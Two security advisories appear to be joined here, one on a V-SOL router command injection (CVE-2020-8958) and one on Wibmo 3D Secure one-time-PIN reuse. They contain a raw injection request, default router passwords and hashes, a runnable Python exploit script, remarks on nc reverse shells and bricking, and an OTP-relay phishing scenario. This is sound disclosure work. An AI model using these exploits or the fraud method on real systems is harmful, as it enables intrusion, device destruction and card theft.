Arbitrary OS command injection on V-SOL home routers

This article details an arbitrary OS command injection vulnerability present in the management portal for several GPON home routers manufactured by Guangzhou V-SOLUTION (“V-SOL”). V-SOL manufactures a variety of FTTH and FTTB products, including residential gateway devices, network switches, line termination devices, and more.

This vulnerability was discovered and reported to the vendor in February of 2020, and to date, a patch has not been released. I decided that I would publish details about this specific vulnerability shortly after researchers Pierre Kim and Alexandre Torres published their own work documenting what they surmised to be potential backdoor accounts present in optical line termination devices manufactured by vendor ‘C-Data’ — as well as those manufactured by V-SOL.

CVE-2020-8958

The vulnerable endpoint is part of the ‘PING diagnosis’ functionality that is available on the device management portal, located at <IP_ADDR>/boaform/admin/formPing. Arbitrary command execution can be achieved by sending a crafted HTTP POST request containing shell meta-characters to the PING diagnosis endpoint.

POST http://<IP_ADDR>/boaform/admin/formPing HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://<IP_ADDR>
Connection: keep-alive
Referer: http://<IP_ADDR>/diag_ping_admin_en.asp
Upgrade-Insecure-Requests: 1
Host: <IP_ADDR>

target_addr=%3Bcat%20%2Fetc%2Fpasswd&waninf=LAN

A screenshot of the login form on the management portal

Administrator credentials are required in order to access the management portal and exploit this flaw. Default credentials for the device can be found in the table below. The hashes are MD5-crypt ($1$) with an empty salt field, so they can be checked against a wordlist with no per-account salt to slow the attempt down; the cleartext is given where it was recovered.

Username  Hash                        Password     UID  GID  Home:Shell
admin     $1$$CoERg7ynjYLsj2j4glJ34.  admin        0    0    /tmp:/bin/cli
adsl      $1$$m9g7v7tSyWPyjvelclu6D1  realtek      0    0    /tmp:/bin/cli
e8c       $1$$L7MaPr42HrZ25CRVY1/89/  (not given)  0    0    /tmp:/bin/cli
user      $1$$ex9cQFo.PV11eSLXJFZuj.  user         1    0    /tmp:/bin/cli

Note: Some versions of the device may come with different default credentials for accessing the administrative account. NETLINK, an Indian distributor of V-SOL devices, supplies stdONU101 as the default password for the administrative account.

A proof-of-concept script is available in this repository; running it returns the contents of the /etc/passwd file on a given vulnerable device. The shell's help command lists the built-in commands available on the system.

. : [ [[ alias bg break cd chdir continue echo eval exec exit
export false fg hash help jobs kill let local printf pwd read
readonly return set shift source test times trap true type ulimit
umask unalias unset wait
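The request above, packaged as an added example rather than the author's own PoC script: it builds the formPing body with the same encoding as the capture, shows the address check the handler should have applied, and parses the /etc/passwd output the PoC returns. The session cookie handling is an assumption (the advisory only states that admin credentials are required, not how the portal tracks a login), and the SAMPLE_PASSWD lines are constructed from the credential table above with an empty GECOS field.

```python
# Added example, not the author's PoC script. Builds the formPing request from the
# advisory, shows the server-side check the handler lacks, and parses /etc/passwd
# output. Session handling is an assumption: the advisory does not document the login.
import argparse
import ipaddress
import urllib.parse
import urllib.request

# Characters that let the injected field break out of the ping command line.
SHELL_METACHARS = set(";|&`$(){}<>\n\r'\"\\ ")


def build_ping_body(command: str, waninf: str = "LAN") -> str:
    """Form body for /boaform/admin/formPing with `command` injected after ';'.

    quote (not quote_plus) with safe="" reproduces the advisory's encoding:
    space -> %20, '/' -> %2F, ';' -> %3B.
    """
    return urllib.parse.urlencode(
        {"target_addr": ";" + command, "waninf": waninf},
        quote_via=urllib.parse.quote,
        safe="",
    )


def is_safe_target_addr(value: str) -> bool:
    """The check the handler should apply: accept only a literal IP address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def looks_injected(value: str) -> bool:
    """Detection heuristic for a decoded target_addr value (proxy or web log)."""
    return any(ch in SHELL_METACHARS for ch in value)


def parse_passwd(text: str) -> dict:
    """Turn /etc/passwd lines into {user: {hash, uid, gid, home, shell}}."""
    users = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue  # blank lines and anything that is not a passwd record
        name, pw_hash, uid, gid, _gecos, home, shell = fields
        users[name] = {"hash": pw_hash, "uid": int(uid), "gid": int(gid),
                       "home": home, "shell": shell}
    return users


def send_ping_diag(host: str, command: str, cookie: str = "", timeout: float = 10.0) -> str:
    """POST the injected body to a device and return the raw response body.

    `cookie` is assumed to carry an authenticated portal session (taken from a
    browser login); the advisory does not document the login exchange itself.
    """
    url = f"http://{host}/boaform/admin/formPing"
    req = urllib.request.Request(url, data=build_ping_body(command).encode(), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Referer", f"http://{host}/diag_ping_admin_en.asp")
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample in the shape of the credential table above (GECOS assumed empty).
SAMPLE_PASSWD = """\
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/cli
e8c:$1$$L7MaPr42HrZ25CRVY1/89/:0:0::/tmp:/bin/cli
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/cli
"""

if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="formPing command injection (CVE-2020-8958)")
    ap.add_argument("host")
    ap.add_argument("--cookie", default="", help="authenticated portal session cookie")
    ap.add_argument("--command", default="cat /etc/passwd")
    args = ap.parse_args()
    print(send_ping_diag(args.host, args.command, args.cookie))
```

build_ping_body("cat /etc/passwd") yields exactly the 47-byte body in the capture above. is_safe_target_addr rejects anything that is not a bare IP literal, which is the right contract for a ping diagnostic that is fed to a shell; if hostnames must be supported, validate them against a strict hostname pattern and pass the value to ping as an argv element rather than through a shell.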

A list of binaries available on the device can be found below.

11N_UDPserver
ShowStatus
aipc_util
arp
ash
auth
awk
boa
brctl
busybox
cat
chat
chmod
cli
config_wlan
configd
cp
ctadmin
cupsd
cwmpClient
dbg_tool
df
dhclient
dhcpd
dhcrelayV6
diag
diff
dnsmasq
ebtables
echo
ecmh
egrep
eponoamd
ethctl
expr
flash_erase
flash_eraseall
ftp
ftpd
fuser
grep
halt
ifconfig
igmpproxy
inetd
init
insmod
ip
ip6tables
ipcs
iptables
iptables-batch
iwcontrol
iwpriv
jsct_getloid
kill
killall
klogd
led
ledtest
linuxrc
loadconfig
login
loopback
lp
lpadmin
lpstat
ls
lsmod
md5sum
mdev
mfcv6d
mib
midware_intf
mini_upnpd
minidlna
miniupnpd
mkdir
mknod
mount
mpctl
nc
ntfs-3g
nv
oamcli
omci_app
omcicli
parallel
pidof
ping
ping6
pondetect
poweroff
ps
qc
radvd
radvdump
reboot
rm
rmmod
route
routed
saveconfig
sed
sh
show
sleep
slogd
smbd
spppctl
spppd
startcupsd
startup
stty
systemd
tar
tc
tcp2dev
telnetd
tftp
tftpd
top
traceroute
udhcpc
udhcpd
udpechoserver
umount
updatedd
updateddctrl
upnpctrl
upnpmd_cp
usbmount
vconfig
vsEncrypt
vsntp
vswdg
wdg
wget
wget_manage
wscd
xmlconfig

Note: Executing the flash_eraseall command on a vulnerable device will, for all practical purposes, leave the device permanently bricked.

The device runs BusyBox and ships a limited set of applets. The available applets are listed below.

ash, awk, cat, chmod, cksum, cmp, cp, df, diff, echo, egrep, expr,
fuser, grep, halt, ifconfig, init, insmod, ipcs, kill, killall,
klogd, linuxrc, ls, lsmod, md5sum, mdev, mkdir, mknod, mount, nc,
pidof, ping, ping6, poweroff, ps, reboot, rm, rmmod, route, sed,
sh, sleep, stty, tar, top, traceroute, umount, vconfig

A remote attacker can obtain a reverse shell on the device using nc. It is also possible to wget files and write them to the /var/config directory on the device, which an attacker can use to download shell scripts (the device ships ash, not bash) or other files for post-exploitation activity on the system.

Note: wget fails to fetch files, or rather returns empty files, when the server hosting the file uses HTTPS, which suggests the BusyBox build has no TLS support.

Survey of affected devices

A brief survey of vulnerable devices reveals only one hardware version in use: Version 1.1. Software builds known to be vulnerable range from V1.9.1-181203 to V2.9.0-181024, and builds prior to V1.9.1-181203 are suspected to be affected as well.

Note: No devices running build versions prior to V1.9.1-181203 were discovered during the course of this research.

In February, when the issue was first reported to the manufacturer, the Shodan search engine was indexing a total of 8,387 vulnerable devices. This figure, however, might not be fully representative of the actual number of vulnerable devices at any given point, considering that a) results indexed on Shodan only represent those devices that, at the time, had remote management enabled and b) some users might have changed the administrative credentials used to access the management portal.

A heat-map of countries where vulnerable devices are located (Shodan)

By the time this post was published, the number of vulnerable devices indexed on Shodan had dropped sharply, to about 1,900. The reason for this decrease is not immediately apparent. A short per-country breakdown follows.

Country      Number of devices
Cambodia     579
India        571
Brazil       239
Bulgaria     159
Philippines   95

UPDATE — July 15, 2020 (6 PM IST)

After this vulnerability was publicly disclosed, it became apparent that a sizeable number of vulnerable devices had been omitted from the list above, because the manufacturer had made cursory changes (such as to the <title> tag) on the landing page of the management portal of some devices. This initially hindered device discovery through fingerprinting; the updated tally of publicly accessible vulnerable devices now exceeds 20,000.

An updated heat-map of countries where vulnerable devices are located (Shodan)

Final notes

Though the device in question is originally manufactured by V-SOL, it is primarily sold around the world through a network of regional distributors. In some cases, distributors will also place their own branding on both the physical hardware and the management portal for the device.

While it was not feasible to compile a conclusive list of distributors, V-SOL states that they have shipped over 500,000 devices that are sold by distributors in Brazil, India, Ukraine, Poland, Thailand, and Bangladesh. On their website, V-SOL also states that they have produced over 2 million individual FTTx units for China Telecom and China Unicom.

In India, NETLINK (2801RW), SyroTech (HG323RGW), Digisol (DG-GR1310), and DBC Technologies are just a few of the companies that are involved in the marketing and distribution of networking devices manufactured by V-SOL. As of now, the devices that are offered by NETLINK and Digisol are confirmed to be vulnerable.

In the recent past, several other GPON network devices have been found to be vulnerable in the same way. For instance, in 2018 researchers disclosed a similar flaw (CVE-2018-10561, an authentication bypass that was chained with the command injection CVE-2018-10562) affecting devices manufactured by California-based DASAN Zhone Solutions. The ecosystem of such devices has only become more exposed since then, especially in light of the aforementioned research published by Kim et al.

Vulnerability information

Vendor:                Guangzhou V-SOLUTION
Description:           Guangzhou 1GE ONU devices V2801RW and V2804RGW running build version 1.9.1-181203 through 2.9.0-181024 allow remote attackers to execute arbitrary OS commands via shell metacharacters in the boaform/admin/formPing Dest IP Address field. [CVE-2020-8958]
Vulnerability class:   Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) [CWE-78]
Impact:                Arbitrary OS command execution
Remotely exploitable:  Yes

Disclosure timeline

  • Feb 11, 2020 – Vendor informed of vulnerability via email;
  • Feb 13, 2020 – CVE-2020-8958 assigned;
  • July 15, 2020 – Vulnerability publicly disclosed.

Attacking a weak 3D Secure implementation

This article documents a security flaw in the way the 3D Secure implementation of Wibmo, the primary integrator of the 3D Secure protocol for banks in India, generates and processes the one-time PIN used for cardholder verification. The Wibmo 3D Secure Access Control Server mishandles transactions initiated within 180 seconds of each other: it generates and delivers a single, non-unique one-time PIN for both. The flaw allows an attacker to repurpose a one-time PIN generated for a low-value transaction (e.g., 10 INR) to complete a second transaction of an arbitrary amount (e.g., 1000 INR).

3D Secure 1.0

The 3D Secure (“Three-Domain Secure”) protocol was originally developed by Arcot Systems to add a further layer of authentication to card-based transactions on the Internet. 3D Secure 1.0 (3DS1) has been the de facto standard for online cardholder verification and has been adopted by several major card schemes, such as Visa (Verified by Visa) and Mastercard (SecureCode).

The first iteration of the protocol has been criticized over time by various parties, including online merchants, who have argued that the extra step hurts conversion rates, and academic researchers, who have stated that the protocol may not be as effective at preventing card fraud as it is purported to be. 3DS1 has also been repeatedly criticized for non-uniformity, with implementations described as “inconsistent from bank to bank and country to country.”

The Reserve Bank of India has long mandated that banks within the country implement “additional factor authentication” for all transactions where the physical presence of the payment instrument cannot be verified, i.e., card-not-present transactions that involve no interaction with a point-of-sale terminal. Indian banks traditionally perform online cardholder verification through an additional authentication step, such as a user-defined PIN, a passphrase, or a dynamic one-time PIN (OTP). While mandatory cardholder verification is generally perceived as a step in the right direction, it should be noted that the Reserve Bank of India has not issued guidelines or best practices on how banks should implement additional factor authentication securely.

Wibmo 3DS 1.0

Wibmo — previously known as enStage — is a financial software and services provider based in Bangalore, India. The company acts as a 3DS1 integrator for a large number of significant financial institutions in India, including banks like Punjab National Bank, Kotak Mahindra Bank, Corporation Bank, and others.

The mechanism used by the Wibmo 3DS1 Access Control Server to generate the one-time PIN mishandles transactions initiated within 180 seconds of each other: a single, non-unique OTP is generated and delivered for both.

The flaw can be observed by initiating a transaction for a low arbitrary amount (e.g., 1 INR) and then, within 180 seconds, initiating a parallel transaction for a higher arbitrary amount (e.g., 1000 INR). The OTP mechanism on the 3DS Access Control Server generates and delivers the same OTP to the customer in both cases, and that OTP can then be used to authenticate either of the two transactions.

Store ABC - Verified by Visa

The two transactions need not be limited to the same merchant, meaning that, the OTP generated for transacting at Store ABC will be identically generated for transacting at Store XYZ — as long as the second transaction was initiated within the 180-second window. Another factor to note is that, the two transactions need not be initiated from the same IP address for the same OTP to be delivered twice. If that, however, were the case, perhaps not generating a fresh one-time PIN for the second transaction could be excused.

Store XYZ - Verified by Visa

Insecure OTP Generation

The non-uniqueness of the one-time PIN stems from the OTP generation mechanism employed by the 3DS Access Control Server, which relies solely on the customer's credit or debit card number, combined with a 180-second timer set by the Access Control Server during which requests to generate a fresh OTP are not entertained. In effect, a fresh one-time PIN is not generated until 180 seconds have elapsed since the previous one, and parameters such as TXN_ID, TXN_VALUE, and IP_ADDR play no part in the derivation.

Diagram: insecure OTP generation method (current)

Diagram: secure OTP generation method (ideal)

The 180-second timer on OTP generation was presumably put in place to reduce friction, for instance where a customer with poor cellular coverage repeatedly asks for the OTP to be resent in quick succession. Even granting that use case, the decision to derive the OTP solely from the card number, rather than also from dynamic parameters such as TXN_ID, which would make the generated OTP unique across transactions, is hard to justify: a resend can reuse the OTP pending for the same transaction without ever sharing it with a different one.
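The two generation methods contrasted above, as an added model that is not Wibmo's code: WeakOtpService reproduces the behaviour the article describes (OTP keyed on the card number alone, nothing fresh for 180 seconds, single use but not bound to a transaction), and TransactionBoundOtpService is one way to build the ideal method (OTP derived with HMAC from card number, TXN_ID, amount and a per-transaction nonce, valid only for that transaction). The class and function names, the HMAC-SHA256 derivation and the test card number are this example's own assumptions; the 180-second window and the bait/target amounts are the article's figures.

```python
# Added example, not Wibmo's code: a model of the OTP behaviour described above.
# Names, the HMAC derivation and the test PAN are this example's assumptions.
import hashlib
import hmac
import secrets
import time

OTP_DIGITS = 6
REUSE_WINDOW_SECONDS = 180  # the article's figure


class WeakOtpService:
    """OTP keyed on the card number only; no fresh OTP for 180 s after the last one."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._active = {}  # card_number -> (otp, issued_at)

    def issue(self, card_number: str, txn_id: str, amount: int) -> str:
        now = self._clock()
        cached = self._active.get(card_number)
        if cached is not None and now - cached[1] < REUSE_WINDOW_SECONDS:
            return cached[0]  # txn_id and amount are ignored: second transaction gets the same OTP
        otp = f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self._active[card_number] = (otp, now)
        return otp

    def verify(self, card_number: str, txn_id: str, amount: int, otp: str) -> bool:
        cached = self._active.get(card_number)
        if cached is None or not hmac.compare_digest(cached[0], otp):
            return False
        del self._active[card_number]  # single use, but any transaction on the card may consume it
        return True


class TransactionBoundOtpService:
    """OTP derived from card number, TXN_ID, amount and a per-transaction nonce."""

    def __init__(self, key: bytes, clock=time.time, ttl_seconds: int = 180):
        self._key = key
        self._clock = clock
        self._ttl = ttl_seconds
        self._pending = {}  # txn_id -> (card_number, amount, nonce, issued_at)

    def _derive(self, card_number: str, txn_id: str, amount: int, nonce: bytes) -> str:
        msg = b"|".join([card_number.encode(), txn_id.encode(), str(amount).encode(), nonce])
        digest = hmac.new(self._key, msg, hashlib.sha256).digest()
        return f"{int.from_bytes(digest[:4], 'big') % 10 ** OTP_DIGITS:0{OTP_DIGITS}d}"

    def issue(self, card_number: str, txn_id: str, amount: int) -> str:
        nonce = secrets.token_bytes(16)  # a resend for the same txn_id issues a new OTP for that txn only
        self._pending[txn_id] = (card_number, amount, nonce, self._clock())
        return self._derive(card_number, txn_id, amount, nonce)

    def verify(self, card_number: str, txn_id: str, amount: int, otp: str) -> bool:
        rec = self._pending.get(txn_id)
        if rec is None:
            return False
        rec_card, rec_amount, nonce, issued_at = rec
        if rec_card != card_number or rec_amount != amount:
            return False  # the OTP is bound to the transaction it was issued for
        if self._clock() - issued_at > self._ttl:
            del self._pending[txn_id]
            return False
        if not hmac.compare_digest(self._derive(card_number, txn_id, amount, nonce), otp):
            return False
        del self._pending[txn_id]  # single use
        return True


def relay_attack(service) -> dict:
    """The article's scenario: a 10 INR bait transaction and a 1000 INR target transaction
    started within the window; the victim only ever sees (and hands over) the bait OTP."""
    card = "4111111111111111"  # constructed test PAN
    otp_bait = service.issue(card, "TXN-A", 10)
    otp_target = service.issue(card, "TXN-B", 1000)
    accepted = service.verify(card, "TXN-B", 1000, otp_bait)
    return {"same_otp": otp_bait == otp_target, "target_txn_accepted_with_bait_otp": accepted}
```

relay_attack(WeakOtpService()) reports that the two transactions received the same OTP and that the target transaction was accepted with the bait OTP, which is the whole of the attack in the next section. With TransactionBoundOtpService the bait OTP is rejected for TXN-B, and because the amount is part of the derivation, an OTP also cannot be reused for the same TXN_ID with a tampered amount.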

In an email response, Wibmo's security team confirmed that the OTP generation mechanism does not account for “a specific session or transaction,” stating that only the payment card number is treated as an input parameter. The security team went on to state that the weak handling of OTP generation “is not a flaw in the system, but a known functionality,” which is certainly not true: other banks that use the 3D Secure protocol, such as HDFC Bank, generate a unique one-time PIN for each transaction, regardless of the time elapsed since the previous OTP.

The email from the Wibmo security team further remarked that, since an OTP expires after being used once, “an OTP generated for two parallel transactions can ultimately still only be used in one.” That is precisely the problem: the single use is spent on whichever transaction is submitted first, and an attacker can make sure it is theirs. The following section demonstrates how the flaw can be used to carry out a convincing OTP relay or real-time phishing attack, similar to the automated phishing of 2FA tokens used to defeat Google's 2FA.

Exploitation

An attacker can carry out an OTP relay or real-time phishing attack to automate the siphoning of user funds. The first step of such an attack involves the customer submitting an OTP to the attacker's domain, which masquerades as a legitimate 3D Secure authentication page but is in fact only a wrapper for acquiring the OTP from the victim. The wrapper calls a payment API to initiate the first transaction with a non-suspicious value and, upon submission of the OTP to the wrapper page, immediately initiates and completes a transaction for a predefined high-value amount.

A tool such as Piotr Duszynski's Modlishka, Mike Felch's CredSniper, or FireEye's ReelPhish can be configured to provision an automated phishing setup targeting the Wibmo 3D Secure ACS. A key advantage for an attacker is that 3D Secure ACS URLs are, in most cases, not memorable and thus not immediately recognizable to a victim, unlike the web addresses of popular services such as Google or Yahoo. Alternatively, an unsophisticated actor may simply choose to remain low-tech and perform a tried and trusted social engineering attack.

Conclusion

The scope of affected banks is somewhat difficult to deduce in this case. Potentially affected banks can be identified prima facie through the presence of a “Powered by Wibmo” footer on the Access Control Server webpage. At the same time however, banks can choose to modify their implementation of 3D Secure 1.0, which means that particular banks may or may not employ the flawed OTP mechanism. Nevertheless, it can authoritatively be said that this flaw does affect all payment cards issued by Kotak Mahindra Bank and Punjab National Bank, at the very least.

An extended list of banks which have used Wibmo for integration with 3D Secure 1.0 can be found here.

This flaw was disclosed to Wibmo on August 3, 2019. The security team at Wibmo closed the issue and marked it as known functionality on August 12, 2019. The flaw was publicly disclosed on August 25, 2019. I would like to thank Abhay Rana for the assistance he provided in helping ascertain the scope of this issue.